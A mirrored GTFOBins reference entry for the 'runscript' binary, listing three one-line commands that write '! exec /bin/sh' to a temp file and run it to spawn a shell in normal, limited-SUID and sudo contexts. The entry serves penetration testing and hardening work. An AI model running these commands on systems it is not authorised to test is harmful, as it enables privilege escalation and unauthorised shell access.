1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/runscript.md
2023-10-21 13:38:18 +02:00

335 B

functions
shell limited-suid sudo
code
TF=$(mktemp) echo '! exec /bin/sh' >$TF runscript $TF
code
TF=$(mktemp) echo '! exec /bin/sh' >$TF ./runscript $TF
code
TF=$(mktemp) echo '! exec /bin/sh' >$TF sudo runscript $TF